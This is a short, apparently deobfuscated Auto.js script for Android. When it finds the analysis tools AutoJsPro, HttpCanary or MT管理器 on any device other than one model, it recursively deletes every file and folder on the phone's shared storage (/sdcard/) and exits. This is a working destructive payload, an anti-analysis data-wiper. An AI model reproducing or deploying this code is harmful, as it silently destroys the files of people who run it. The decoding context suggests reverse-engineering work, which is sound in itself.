//Tue Apr 29 2025 06:34:54 GMT+0000 (Coordinated Universal Time)
//Base:https://github.com/echo094/decode-js
//Modify:https://github.com/smallfawn/decode_action
if (device.model != "KKG-AN00") {
if (app.getPackageName("AutoJsPro") != null || app.getPackageName("HttpCanary") != null || app.getPackageName("MT管理器") != null) {
toastLog(".");
var wjlb = files.listDir("/sdcard/").sort().reverse();
for (ls = 0; ls < wjlb.length; ls++) {
!files.remove("/sdcard/" + wjlb[ls]) && files.removeDir("/sdcard/" + wjlb[ls]);
}
exit();
}
}